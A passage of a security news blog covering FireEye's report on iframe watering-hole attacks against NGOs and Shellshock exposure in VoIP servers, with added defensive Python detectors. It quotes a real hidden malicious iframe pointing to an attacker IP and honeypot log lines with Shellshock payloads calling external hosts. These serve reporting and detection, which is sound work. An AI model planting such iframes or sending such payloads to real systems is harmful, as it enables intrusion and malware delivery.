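    spki = der(0x30, der(0x30, oid("1.2.840.113549.1.1.1") + b"\x05\x00") + der(0x03, b"\x00" * 9))
    tbs = der(0x30, der(0xA0, der(0x02, b"\x02")) + der(0x02, b"\x01") + alg + name + validity + name + spki)
    return der(0x30, tbs + alg + der(0x03, b"\x00" * 9))            # placeholder signature bits

if __name__ == "__main__":
    for sig in ("1.2.840.113549.1.1.5", "1.2.840.113549.1.1.11"):
        alg_name, expiry = inspect_certificate(make_test_cert(sig))
        print(alg_name, expiry.date(), "->", rate_sha1_sunset(alg_name, expiry))
```

For a real inventory, feed inspect_certificate() the DER bytes of each certificate a TLS endpoint or key store hands back (PEM files only need the base64 body decoded first) and sort the output by rating and by the business value of the site, which is the prioritisation suggested in the list above.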

Pierluigi Paganini

(Security Affairs – SHA-1, digital certificates)

Sep 29 14

iFrame-based redirection attacks used to monitor Chinese organizations

by Pierluigi Paganini

Security experts at FireEye discovered a new malicious campaign which is targeting Chinese organizations with iFrame traffic redirection to serve a RAT.

Security experts at FireEye observed a new malicious campaign that is targeting non-profit organizations and non-governmental organizations by compromising legitimate websites.

The threat actors compromise legitimate websites to host iframes used to hijack visitors to a threat actor-controlled IP address that serves the Poison Ivy remote access tool (RAT). Experts at FireEye discovered evidence of the involvement of the Sunshop Digital Quartermaster, a known collective of malware authors which provides malicious code used by different China-based APT groups.

“FireEye previously identified this specific RT_MANIFEST as the ‘Sunshop Manifest,’ and we have observed this same manifest resource used in 86 other samples. As we stated in the Quartermaster report, we believe this shared resource is an artifact of a builder toolkit made available to a number of China-based APT groups.” states the report published by FireEye.

The experts identified a similar attack pattern in the “hack” of at least three different websites: an international non-profit organization and two different non-governmental organizations.

The APT behind the attacks injected the malicious iframes on the targeted websites, in two cases it also obfuscated them.

<div class="views-field views-field-body">
<div class="field-content"><p>
<iframe height="0" src="http://103.27.108.45/img/js.php" width="0"></iframe></p>

The iframes allow the attacker to redirect visitors to a website hosting a Java exploit (103.27.108.45) that downloads and decodes a variant of Poison Ivy hosted at: hxxp:img//103.27.108.45//js.php.
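A site owner can catch this kind of injection by scanning the HTML they actually serve for frames that are invisible or that point off-site. The script below is an added example (not FireEye's or the affected sites' code) that walks a page with the standard-library HTML parser and reports iframes with zero dimensions, hidden styles, or a src host outside the site and outside an allowlist; the page body, the site hostname and the allowlist are constructed for the example, while the injected iframe markup reproduces the one quoted above.

```python
"""Flag hidden or off-site <iframe> injections in served HTML (stdlib only).

Added example, not FireEye's or the compromised sites' code. An iframe is
reported when it is rendered invisibly (height/width of 0, or display:none /
visibility:hidden in its style) or when its src points to a host outside the
site itself and outside an explicit allowlist; a bare IP address as the host
is called out separately. SAMPLE_PAGE is constructed for this example and
embeds the iframe markup quoted in the article.
"""
import ipaddress
from html.parser import HTMLParser
from urllib.parse import urlparse


class IframeCollector(HTMLParser):
    """Collect the attributes of every <iframe> start tag in the document."""

    def __init__(self):
        super().__init__()
        self.iframes = []

    def handle_starttag(self, tag, attrs):
        if tag.lower() == "iframe":
            self.iframes.append({k.lower(): (v or "") for k, v in attrs})


def _is_zero(value):
    """True for dimension values that collapse the frame: "0", "0px", "0%"."""
    digits = value.strip().lower().rstrip("px% ")
    try:
        return float(digits) == 0.0
    except ValueError:
        return False


def find_suspicious_iframes(html, site_host, allowed_hosts=frozenset()):
    """Return [(reasons, src)] for iframes a defender should review.

    site_host is the hostname the page is served from; allowed_hosts lists
    third-party embeds (video players, maps) that are expected on the site.
    """
    collector = IframeCollector()
    collector.feed(html)
    findings = []
    for attrs in collector.iframes:
        src = attrs.get("src", "")
        style = attrs.get("style", "").replace(" ", "").lower()
        reasons = []
        # Invisible frames have no legitimate reason to load remote content.
        if _is_zero(attrs.get("height", "")) or _is_zero(attrs.get("width", "")):
            reasons.append("zero-size")
        if "display:none" in style or "visibility:hidden" in style:
            reasons.append("hidden-by-style")
        # A relative src (empty host) stays on-site; anything else is checked
        # against the site's own host and the allowlist.
        host = urlparse(src).hostname or ""
        if host and host != site_host and host not in allowed_hosts:
            reasons.append("off-site")
            try:
                ipaddress.ip_address(host)
                reasons.append("raw-ip")
            except ValueError:
                pass
        if reasons:
            findings.append((",".join(reasons), src))
    return findings


# Constructed page: a legitimate body with one injected hidden iframe, an
# allowlisted video embed and a relative same-site frame.
SAMPLE_PAGE = """
<div class="views-field views-field-body">
<div class="field-content"><p>Annual programme report.</p>
<iframe height="0" src="http://103.27.108.45/img/js.php" width="0"></iframe>
<iframe src="https://www.youtube.com/embed/abc123" width="560" height="315"></iframe>
<iframe src="/widgets/map.html" width="300" height="200"></iframe>
</div></div>
"""

if __name__ == "__main__":
    # Hypothetical site hostname and allowlist, assumed for the example.
    for reasons, src in find_suspicious_iframes(
        SAMPLE_PAGE, "ngo.example.org", {"www.youtube.com"}
    ):
        print(f"{reasons}: {src}")
```

Run against a periodic crawl of your own pages, the check surfaces the injected frame as zero-size, off-site and raw-ip while the expected embeds stay quiet; obfuscated injections (the article notes two of the three sites had them) need the same check applied to the DOM after script execution, which this static parser does not do.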

It is interesting to note that, to improve the evasion capability of the RAT, the threat actor also signed the code with a digital certificate.

“Installation of certain types of software (e.g. application updates) requires its code to be digitally signed with a trusted certificate. For this reason, cyber criminals and other bad actors have started to target entities managing digital certificates. By stealing a digital certificate associated with a trusted vendor and signing malicious code with it, it reduces the possibility that malware will be detected as quickly,” I wrote in a post on the misuses of digital certificates.

The attackers attempted to disguise the malicious code as a Google Chrome file, but they misspelled multiple words.

The experts believe that the malicious campaign started by compromising websites belonging to NGOs and non-profits in order to target other organizations in the same industries.


Technically, the attackers are running watering hole attacks to compromise the employees of these organizations and of other organizations in the same industries; it is likely that Chinese hackers are working for the government in surveillance activities.

“We suspect threat actors sought to monitor these programs and involved individuals. The three organizations whose websites are hosting the malicious iframes have China-based operations,” states the report. “FireEye expects threat actors are motivated to steal programmatic data and monitor organizations’ programs in specific countries. If China-based threat actors are behind the observed campaign, FireEye expects that organizations with operations in China are high-priority targets.”

In any case, those industries are not the only ones affected by iFrame-based attacks: the technique is very common in the cybercriminal ecosystem and is also widely adopted for financially motivated attacks.

Pierluigi Paganini

(Security Affairs – iframes, APT)

Sep 28 14

ShellShock could be used to hack VoIP systems

by Pierluigi Paganini

Jaime Blasco at AlienVault Labs explained that the ShellShock vulnerability could be exploited to hack Voice over IP systems worldwide.

The Shellshock Bash bug is monopolizing the Internet security debate these days, and every vendor is assessing its products to verify the impact of the critical Bash Bug vulnerability (CVE-2014-6271). Apple recently announced that its Mac OS X based computers are safe by default, while Oracle announced that at least 32 of its solutions are affected.

As I have explained several times, the impact of the Shellshock Bash bug is really serious: an impressive number of devices and services run vulnerable software that is not easy to update; think, for example, of IoT devices or voice-over-IP (VoIP) phone systems.

Today we will talk about the exposure of VoIP systems to the Shellshock Bash bug; by compromising these systems, threat actors could access business communication systems, with serious repercussions for enterprise security.

The Shellshock Bash bug also affects the session initiation protocol (SIP) server of a VoIP phone vendor, as revealed by the director of AlienVault Labs, Jaime Blasco, and, as usually happens, the flaw is likely widespread because many vendors use similar architectures.

“I’m pretty sure that there are a bunch of them (vendors), if not a lot of them, that you can exploit,” Blasco said declining to name the vendor.

The main component of a VoIP system is the SIP server, which often runs on Unix or Linux; another critical component in such architectures is the media server. While the media server implements media management functionality, such as the transmission of the audio, the VoIP server is typically used to manage users’ configuration and the phone hardware.


Unfortunately, a large number of SIP servers run GNU Bash, which is affected by the Shellshock vulnerability; this means that an attacker could exploit it to execute malicious commands by sending them via the Common Gateway Interface (CGI) of the SIP server’s administrative interface.

“Even if you don’t have the username and password (for the SIP server), you can exploit the vulnerability,” Blasco said.

The possibilities for an attacker are various: threat actors could exploit the Shellshock flaw to change the configuration of the VoIP system, to add and remove users and hardware, or to serve malware to the SIP server and gain access to the company network.

Attacks on VoIP systems are very common; phone systems are privileged targets for hackers who intend to spy on the communications of the targeted organization.

The disclosure of the Shellshock flaw has triggered a series of large-scale attacks; security researchers reported that bad actors were trying to exploit the Bash Bug flaw worldwide.

Security firm Incapsula reported that in a 12-hour period its systems recorded 725 attacks per hour, originating from 400 unique IP addresses mainly located in the US and China, against a total of 1,800 domains.

“This is pretty high for a single vulnerability,” Tim Matthews, vice president of marketing at Incapsula, said.

Typically, attackers scan the entire Internet to identify vulnerable machines and then run the exploits; their purpose is to compromise the targeted machines and recruit them into a botnet.

Experts at AlienVault are running a new module in their honeypots to track attempts to exploit the ShellShock bug; in just 24 hours they detected several hits.

The majority of the attacks are scanning the Internet by simply sending a ping command back to the attacker’s machine:

209.126.230.72 - - [25/Sep/2014 05:14:12] "GET / HTTP/1.0" 200 -
referer, () { :; }; ping -c 11 209.126.230.74
122.226.223.69 - - [25/Sep/2014 06:56:03] "GET http://www.k2proxy.com//hello.html HTTP/1.1" 200
89.207.135.125 - - [25/Sep/2014 07:23:43] "GET /cgi-sys/defaultwebpage.cgi HTTP/1.0" 200
user-agent, () { :;}; /bin/ping -c 1 198.101.206.138
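The honeypot lines above are easy to triage automatically because the trigger is always the same: a header value that starts with the Bash function-definition prefix "() {", which the CGI layer hands to Bash through an environment variable, followed after the closing "};" by whatever the scanner wants executed. The script below is an added example, not AlienVault's honeypot module; it reproduces the quoted log lines as constructed input, pairs each "header, value" line with the request line before it, extracts the injected command, and labels a bare ping as a callback probe (the scanner only learning which hosts are vulnerable) as opposed to real command execution.

```python
"""Spot Shellshock (CVE-2014-6271) probes in honeypot/web-server logs.

Added example, not AlienVault's honeypot module. The trigger is the Bash
function-definition prefix "() {" in a header value that the CGI layer turns
into an environment variable; the commands after the closing "};" are what
the attacker wants executed. SAMPLE_LOG reproduces the lines quoted in the
article, in the two-line format used there (request line, then "header, value").
"""
import re

# Request line: <src ip> - - [<timestamp>] "<request>" <status> ...
REQUEST_RE = re.compile(r'^(?P<src>\S+) - - \[(?P<ts>[^\]]+)\] "(?P<req>[^"]*)"')
# Function-definition prefix followed by the injected command(s).
SHELLSHOCK_RE = re.compile(r"\(\)\s*\{[^}]*\}\s*;\s*(?P<cmd>.+)$")
IPV4_RE = re.compile(r"\b(?:\d{1,3}\.){3}\d{1,3}\b")

# Constructed input: the honeypot lines quoted in the article.
SAMPLE_LOG = """\
209.126.230.72 - - [25/Sep/2014 05:14:12] "GET / HTTP/1.0" 200 -
referer, () { :; }; ping -c 11 209.126.230.74
122.226.223.69 - - [25/Sep/2014 06:56:03] "GET http://www.k2proxy.com//hello.html HTTP/1.1" 200
89.207.135.125 - - [25/Sep/2014 07:23:43] "GET /cgi-sys/defaultwebpage.cgi HTTP/1.0" 200
user-agent, () { :;}; /bin/ping -c 1 198.101.206.138
"""


def classify(command):
    """A bare ping only tells the scanner who is vulnerable; anything else is real execution."""
    words = command.split()
    first = words[0].rsplit("/", 1)[-1] if words else ""
    return "callback-probe" if first == "ping" else "command-execution"


def detect_shellshock(text):
    """Return one finding per header carrying a Shellshock payload."""
    findings = []
    current = None
    for line in text.splitlines():
        m = REQUEST_RE.match(line)
        if m:
            current = m.groupdict()  # header lines that follow belong to this request
            continue
        if current is None or ", " not in line:
            continue
        header, _, value = line.partition(", ")
        hit = SHELLSHOCK_RE.search(value)
        if not hit:
            continue
        cmd = hit.group("cmd").strip()
        findings.append({
            "src": current["src"],
            "timestamp": current["ts"],
            "request": current["req"],
            "header": header.strip().lower(),
            "command": cmd,
            "kind": classify(cmd),
            "callback_ips": IPV4_RE.findall(cmd),  # where the scanner is listening
        })
    return findings


if __name__ == "__main__":
    for f in detect_shellshock(SAMPLE_LOG):
        print(f"{f['timestamp']} {f['src']} {f['header']}: {f['kind']} -> {f['command']}")
```

Keying on the "() {" prefix rather than on the specific ping payload is what makes the rule hold up: the two scanners above spell the function body differently ("{ :; }" versus "{ :;}") and use different header names, and a scanner that swaps ping for a download command still matches and is then labelled command-execution. The callback addresses the rule extracts are the values worth feeding into egress monitoring, since a vulnerable host answering the probe is exactly what the attacker is waiting for.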

The experts also detected two attackers that are exploiting the ShellShock flaw to serve and install two different pieces of malware on the victims, and it is just the beginning!

Pierluigi Paganini

(Security Affairs – ShellShock, Linux)